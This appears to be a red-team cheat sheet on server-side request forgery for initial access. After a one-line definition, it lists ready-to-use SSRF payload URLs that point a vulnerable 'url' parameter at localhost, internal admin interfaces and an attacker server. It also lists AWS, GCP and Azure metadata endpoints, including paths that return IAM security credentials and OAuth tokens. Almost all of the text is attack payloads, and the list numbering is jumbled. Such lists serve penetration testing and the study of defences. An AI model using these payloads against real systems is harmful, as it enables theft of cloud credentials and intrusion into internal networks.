redttps

SSRF Initial Access

Description

SSRF (Server-Side Request Forgery) is a type of security vulnerability where an attacker tricks a vulnerable server into making unauthorized or malicious requests to internal or external resources on behalf of the attacker


Cheatsheet

  1. Basic SSRF
    2. https://test.com/test?url=http://169.254.169.254/latest/meta-data/
https://test.com/test?url=http://127.0.0.1:443
https://test.com/test?url=http://10.10.10.10/admin-interface
https://test.com/test?url=http://yourserver.test.com
  2. AWS Metadata
    3. http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/admin-role
  3. GCP Metadata
    4. http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token
  4. Azure Metadata
    5. http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token